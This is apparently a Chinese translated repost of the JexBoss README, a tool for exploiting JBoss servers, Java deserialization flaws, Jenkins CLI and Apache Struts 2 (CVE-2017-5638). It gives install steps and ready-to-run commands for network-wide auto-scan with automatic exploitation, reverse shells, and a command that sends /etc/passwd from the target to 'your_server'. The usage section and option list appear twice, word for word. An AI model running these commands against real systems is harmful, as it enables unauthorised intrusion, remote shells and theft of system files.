JexBoss – JBoss 验证和更新工具
- 服务器
- 2023-01-28
JexBoss 是一个工具,用于测试和利用 JBoss 应用程序服务器和其他 Java 平台、框架、应用程序等中的漏洞。
要求
Python >= 2.7.xurllib3ipaddress在 Linux Mac 上安装
要安装最新版本的JexBoss,请使用以下命令:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
OR:
Download the latest version at:https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080如果您在Python2.6中使用CentOS,请安装Python2.7。在CentOS上使用集合软件scl安装Python 2.7的示例:
yum -y install centos-release-sclyum -y install python27scl enable python27 bash
在 Windows 上安装
如果您使用的是Windows,那么可以使用gitbash来运行JexBoss。按照以下步骤操作:
下载并安装Python下载并安装Git for Windows安装后,运行Git for Windows并键入以下命令:PATH=$PATH:C:\Python27\ PATH=$PATH:C:\Python27\Scripts git clone
https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080
特征
开发和测试了该工具和漏洞:
JBoss 应用程序服务器版本:3、4、5 和 6。多个 Java 框架、平台和应用程序(例如,Java 服务器面 - JSF、Seam 框架、HTTP 上的 RMI、Jenkins CLI RCE (CVE-2015-5317)、远程 JMX (CVE-2016-3427、CVE-2016-8735)等开发媒介包括:
/admin-console在 Jboss 版本 5 和 6 中进行测试和工作/jmx-console在 JBoss 版本 4、5 和 6 中进行测试和工作/web-console/Invoker在 JBoss 版本 4、5 和 6 中进行测试和工作/invoker/JMXInvokerServlet在 JBoss 版本 4、5 和 6 中进行测试和工作Application 反序列化通过http post参数对多个java应用程序、平台等进行测试和工作Servlet 反序列化通过处理序列化对象的servlet对多个java应用程序、平台等进行测试和工作(例如,当您在链接中看到“Invoker”时)Apache Struts 2 CVE-2017-5638在 Apache Struts 2 应用程序中测试Others使用
简单使用示例:$ python jexboss.py 针对 JBoss 的独立模式示例: $ python jexboss.py -u http://192.168.0.26:8080 使用模式: $ python jexboss.py -h 网络扫描模式: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt 具有自动利用模式的网络扫描: $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt 反向外壳(Meterpreter集成)使用 JBoss 服务器后,可以使用自己的 JexBoss 命令外壳或使用以下命令执行反向连接: jexremote=YOUR_IP:YOUR_PORT Example: Shell>jexremote=192.168.0.10:4444 当利用java反序列化漏洞(Application反序列化、Servlet反序列化)时,默认选项是:建立反向shell连接或发送命令来执行。 使用示例对于自定义HTTP参数中的Java反序列化漏洞,以及发送要在受攻击的服务器上执行的自定义命令: $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd curl -d@/etc/passwd http://your_server 对于自定义 HTTP 参数中的 Java 反序列化漏洞并创建反向外壳(这将要求远程主机的 IP 地址和端口): $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name 对于 Servlet 中的 Java 去序列化漏洞(如调用器): $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize 对于Apache Struts 2(CVE-2017-5638) $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 对于 Apache Struts 2 (CVE-2017-5638),带用于身份验证资源的 Cookie $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D" 自动扫描模式: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log 文件扫描模式: $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log 更多选项: optional arguments: -h, --help show this help message and exit --version show programs version number and exit --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!) --disable-check-updates, -D Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt -mode {standalone,auto-scan,file-scan} Operation mode (DEFAULT: standalone) --app-unserialize, -j Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc) --servlet-unserialize, -l Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces) --jboss Check only for JBOSS vectors. --jenkins Check only for Jenkins CLI vector. --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default. --proxy PROXY, -P PROXY Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128) --proxy-cred LOGIN: PASS, -L LOGIN: PASS Proxy authentication credentials (eg -L name:password) --jboss-login LOGIN: PASS, -J LOGIN: PASS JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin) --timeout TIMEOUT Seconds to wait before timeout connection (default 3) Standalone mode: -host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080) Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER): --reverse-host RHOST:RPORT, -r RHOST:RPORT Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331) --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server) --windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe) --post-parameter PARAMETER, -H PARAMETER Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState) --show-payload, -t Print the generated payload. --gadget {commons-collections3.1,commons-collections4.0,groovy1} Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins) --load-gadget FILENAME Provide your own gadget from file (a java serialized object in RAW mode) --force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types. Auto scan mode: -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) -ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443) -results FILENAME File name to store the auto scan results File scan mode: -file FILENAME_HOSTS Filename with host list to be scanned (one host per line) -out FILENAME_RESULTS File name to store the file scan results $ python jexboss.py 针对 JBoss 的独立模式示例: $ python jexboss.py -u http://192.168.0.26:8080 使用模式: $ python jexboss.py -h 网络扫描模式: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt 具有自动利用模式的网络扫描: $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt 反向外壳(Meterpreter集成)使用 JBoss 服务器后,可以使用自己的 JexBoss 命令外壳或使用以下命令执行反向连接: jexremote=YOUR_IP:YOUR_PORT Example: Shell>jexremote=192.168.0.10:4444 当利用java反序列化漏洞(Application反序列化、Servlet反序列化)时,默认选项是:建立反向shell连接或发送命令来执行。 使用示例对于自定义HTTP参数中的Java反序列化漏洞,以及发送要在受攻击的服务器上执行的自定义命令: $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd curl -d@/etc/passwd http://your_server 对于自定义 HTTP 参数中的 Java 反序列化漏洞并创建反向外壳(这将要求远程主机的 IP 地址和端口): $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name 对于 Servlet 中的 Java 去序列化漏洞(如调用器): $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize 对于Apache Struts 2(CVE-2017-5638) $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 对于 Apache Struts 2 (CVE-2017-5638),带用于身份验证资源的 Cookie $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D" 自动扫描模式: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log 文件扫描模式: $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log 更多选项: optional arguments: -h, --help show this help message and exit --version show programs version number and exit --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!) --disable-check-updates, -D Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt -mode {standalone,auto-scan,file-scan} Operation mode (DEFAULT: standalone) --app-unserialize, -j Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc) --servlet-unserialize, -l Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces) --jboss Check only for JBOSS vectors. --jenkins Check only for Jenkins CLI vector. --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default. --proxy PROXY, -P PROXY Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128) --proxy-cred LOGIN: PASS, -L LOGIN: PASS Proxy authentication credentials (eg -L name:password) --jboss-login LOGIN: PASS, -J LOGIN: PASS JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin) --timeout TIMEOUT Seconds to wait before timeout connection (default 3) Standalone mode: -host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080) Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER): --reverse-host RHOST:RPORT, -r RHOST:RPORT Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331) --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server) --windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe) --post-parameter PARAMETER, -H PARAMETER Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState) --show-payload, -t Print the generated payload. --gadget {commons-collections3.1,commons-collections4.0,groovy1} Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins) --load-gadget FILENAME Provide your own gadget from file (a java serialized object in RAW mode) --force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types. Auto scan mode: -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) -ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443) -results FILENAME File name to store the auto scan results File scan mode: -file FILENAME_HOSTS Filename with host list to be scanned (one host per line) -out FILENAME_RESULTS File name to store the file scan results